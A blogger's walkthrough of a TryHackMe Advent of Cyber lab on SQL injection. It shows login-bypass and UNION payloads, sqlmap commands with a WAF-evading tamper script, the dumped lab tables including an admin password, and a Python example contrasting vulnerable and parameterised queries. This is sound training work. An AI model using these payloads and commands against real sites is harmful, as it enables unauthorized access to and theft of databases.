TryHackMe — Advent of Cyber 2 — Day 5

Good afternoon all,

Caught a little nap after the late night shift and should be catching up on a few of the days at least..

Here is the intro for the machine for today:

“After last year’s attack, Santa and the security team have worked hard on reviving Santa’s personal portal. Hence, ‘Santa’s forum 2’ went live.

After the attack, logs have revealed that someone has found Santa’s panel on the website and logged into his account! After doing so, they were able to dump the whole gift list database, getting all the 2020 gifts in their hands. An attacker has threatened to publish a wishlist.txt file, containing all information, but happily, for us, he was caught by the CBI (Christmas Bureau of Investigation) before that. On MACHINE_IP:8000 you'll find the copy of the website and your goal is to replicate the attacker's actions by dumping the gift list!”

Reading through the learning portion of the machine intro, we will be dealing with SQL Injection. This is good. Haven’t dealt with this in a while and usually I just took someone else’s command and used the good ole’ copy pasta. Good chance to learn again.

They do let us know we can try the SQLi login bypass on port 3000, so I’ll play with that for a little bit to familiarize myself before embarrassing myself too much on here….

……

OK, back to it, question one, find the login page (without brute forcing).. This one got me, I was going down the path of admin… login…. nothing. Anyway, I used the hint:

“The name is derived out of 2 words from this question. /s**tap***l”

/santapanel was pretty easy to get out of that..

Question 2: How many entries are there in the gift database?

If we add just a single quote ‘ we do receive a SQL error; this is good.

Doing an ‘ORDER BY’ attack, we can determine our current table is 2 columns; given it is a login form, this makes sense..

Let’s try and enumerate some usernames and passwords. Doing a ‘UNION SELECT username, password FROM users --’ gives us:

Not entirely sure what happened, I expected a table with usernames and passwords. Let’s keep playing around and keep this in mind. We got a session cookie from this; for now, I’m going to copy and paste the data and delete it.

Well, went back to the login page, and it appears it just evaluated to TRUE and logged me in, tested with a simple:

'OR 1=1 --

This got me logged into the same page as above, I guess let’s try and enumerate from his search box. An ‘ORDER BY’ operation will give us 2 columns in this case as well (confirmed by just entering ‘1’ into the search box, the index/ID number for the row).

Anyhow, just playing around (used the example SQLi commands), I was able to extract the users database.

Let’s get back to the questions.. ‘How many entries are there in the gift database?’

'UNION SELECT * FROM users --

This wasn’t my goal, but I will take it as it answers our questions.. Didn’t expect the table to be called ‘users’ for the gifts..
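To make the two injections above concrete from the fixing side, here is an added example (not code from the writeup or from the room): a constructed in-memory SQLite stand-in for santapanel with the users and sequels tables from the sqlmap output (made-up rows), the string-concatenated login and search queries that the ‘ OR 1=1 -- and UNION payloads abuse, and the parameterised versions that treat the same input as plain data.

```python
import sqlite3

# Constructed in-memory stand-in for santapanel's SQLite backend. The schema
# mirrors the sqlmap output in the writeup; the rows here are made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(password TEXT, username TEXT);
        INSERT INTO users VALUES ('not-the-real-password', 'admin');
        CREATE TABLE sequels(kid TEXT, age INTEGER, title TEXT);
        INSERT INTO sequels VALUES ('Paul', 9, 'github ownership'),
                                   ('James', 8, 'shoes');
    """)
    return db

def login_vulnerable(db, username, password):
    # Input is pasted straight into the statement: a quote closes the string
    # literal and "--" comments out the password check, so "' OR 1=1 --"
    # makes the WHERE clause true for every row.
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return [row[0] for row in db.execute(sql)]

def login_fixed(db, username, password):
    # Bound parameters: the driver sends the input as data, never as SQL text,
    # so the same payload is just a username nobody has.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in db.execute(sql, (username, password))]

def search_vulnerable(db, term):
    # Two-column result, which is why the writeup's UNION needed two columns
    # and "' UNION SELECT * FROM users --" can append the users table.
    sql = f"SELECT kid, title FROM sequels WHERE kid LIKE '%{term}%'"
    return list(db.execute(sql))

def search_fixed(db, term):
    # The wildcard is added to the bound value, not to the SQL string.
    sql = "SELECT kid, title FROM sequels WHERE kid LIKE ?"
    return list(db.execute(sql, (f"%{term}%",)))

if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"
    print("vulnerable login: ", login_vulnerable(db, payload, ""))  # ['admin']
    print("fixed login:      ", login_fixed(db, payload, ""))       # []
    dump = "' UNION SELECT * FROM users --"
    print("vulnerable search:", search_vulnerable(db, dump))        # includes admin row
    print("fixed search:     ", search_fixed(db, dump))             # []
```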

I didn’t want to count all of those lines, would lose count on my fingers… pasted the data into a text doc and used

#wc -l gifts.txt

This counts our lines for us and gives us the answer to the question (minus the ‘admin:pass’ line); also in the table we have the answer to the next question: What did Paul ask for? AND this also answers the question: What is admin’s password?..

Anyhow, we did our answers out of order; this leaves us with the question: What is the flag? So, where to begin with this one? For now, I will spare you the playing around with SQL screenshots until I come up with something…

….

Anyway, couldn’t figure it out, went ahead and captured a request with Burp, saved it and sent it along to sqlmap. Also, the hint mentions to just use this to dump the entire database.

#sqlmap -r day5sqlreq

First time came back with nothing.. I forgot that it mentioned they had installed a WAF this year.. used the

--tamper=space2comment

Website used for reference: https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet

Full command used for sqlmap:

#sqlmap -r day5sqlreq --tamper=space2comment --dbms=sqlite --tables

This gives us this when we enumerate for tables:

Database: SQLite_masterdb
[3 tables]
+--------------+
| hidden_table |
| sequels      |
| users        |
+--------------+

Let’s take a look inside the tables…

#sqlmap -r day5sqlreq --tamper=space2comment --dbms=sqlite -D SQLite_masterdb -T <TABLE_NAME> --dump

Database: SQLite_masterdb
Table: users
[1 entry]
+------------------+----------+
| password         | username |
+------------------+----------+
| EhCNSWzzFP6sc7gB | admin    |
+------------------+----------+
Database: SQLite_masterdb
Table: sequels
[22 entries]
+-------------+-----+----------------------------+
| kid         | age | title                      |
+-------------+-----+----------------------------+
| James       | 8   | shoes                      |
| John        | 4   | skateboard                 |
| Robert      | 17  | iphone                     |
| Michael     | 5   | playstation                |
| William     | 6   | xbox                       |
| David       | 6   | candy                      |
| Richard     | 9   | books                      |
| Joseph      | 7   | socks                      |
| Thomas      | 10  | 10 McDonalds meals         |
| Charles     | 3   | toy car                    |
| Christopher | 8   | air hockey table           |
| Daniel      | 12  | lego star wars             |
| Matthew     | 15  | bike                       |
| Anthony     | 3   | table tennis               |
| Donald      | 4   | fazer chocolate            |
| Mark        | 17  | wii                        |
| Paul        | 9   | github ownership           |
| James       | 8   | finnish-english dictionary |
| Steven      | 11  | laptop                     |
| Andrew      | 16  | rasberry pie               |
| Kenneth     | 19  | TryHackMe Sub              |
| Joshua      | 12  | chair                      |
+-------------+-----+----------------------------+
Database: SQLite_masterdb
Table: hidden_table
[1 entry]
+-----------------------------------------+
| flag                                    |
+-----------------------------------------+
| thmfox{FLAG}                            |
+-----------------------------------------+

Yes, the flag is removed from above… as always, you must put in some work.. All in all, this was frustrating but fun, learned a bit about Burp and sqlmap; always tried to avoid the tool since, as far as I recall, you can’t use it in the OSCP exam, but it is a hell of a tool, that is for sure. Anyhow, best of luck.

Until next time,

-3lduderino